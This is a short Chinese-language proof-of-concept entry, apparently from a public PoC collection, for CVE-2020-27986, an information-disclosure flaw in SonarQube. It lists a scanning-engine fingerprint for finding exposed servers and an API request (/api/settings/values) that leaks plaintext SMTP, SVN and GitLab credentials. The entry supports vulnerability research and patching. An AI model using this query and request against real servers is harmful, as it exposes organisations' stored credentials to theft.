Awesome-POC/Web应用漏洞/SonarQube values 信息泄露漏洞 CVE-2020-27986.md
2024-11-06 14:10:36 +08:00

49 lines
516 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# SonarQube values 信息泄露漏洞 CVE-2020-27986
## 漏洞描述
SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息
## 漏洞影响
```
SonarQube
```
## 网络测绘
```
app="sonarQube-代码管理"
```
## 漏洞复现
主页如下
![](images/202202101933673.png)
## 漏洞POC
```plain
http://xxx.xxx.xxx.xxx/api/settings/values
```
![](images/202202101933276.png)
可泄露的为明文SMTP、SVN和Gitlab等敏感信息
![](images/202202101934123.png)
##